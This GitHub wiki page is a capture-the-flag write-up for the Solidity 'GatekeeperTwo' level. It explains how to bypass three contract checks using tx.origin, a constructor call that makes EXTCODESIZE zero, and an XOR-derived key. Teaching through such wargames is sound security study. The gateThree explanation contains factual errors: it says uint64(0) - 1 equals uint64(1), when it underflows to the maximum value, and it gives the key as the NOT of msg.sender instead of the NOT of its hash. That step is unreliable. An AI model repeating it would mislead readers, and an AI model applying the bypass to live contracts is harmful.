Skip to content

14. GatekeeperTwo

Jump to bottom
r1oga edited this page Oct 29, 2022 · 1 revision

Target

Make it through the gatekeeper two.

Weakness

  • gateOne relies on tx.origin.
  • Being able to read the public contract logic teaches how to pass gateTwo and gateThree.

Solidity Concepts

Inline assembly & contract creation/initialization

excodesize and contract initialization

From the Ethereum yellow paper section 7.1 - subtleties we learn:

while the initialisation code is executing, the newly created address exists but with no intrinsic body code⁴. 4. During initialization code execution, EXTCODESIZE on the address should return zero [...]

Hack

  1. gateOne: similar to the gateOne of Level 13 - Gatekeeper One or to the hack of Level 4 - Telephone
  2. gateTwo: call the enter function during contract initialization, i.e from within constructor to ensure EXTCODESIZE = 0
  3. gateThree
    uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) noted a ^ b means a XOR b.
    uint64(0) - 1: underflow, this is equals to uint64(1).
    So we need to take _gatekey = ~msg.sender (Bitwise NOT) to ensure that the XOR product of each bit of a and b will be 1.

Takeaways

During contract initialization, the contract has no intrinsic body code and its extcodesize is 0.

Clone this wiki locally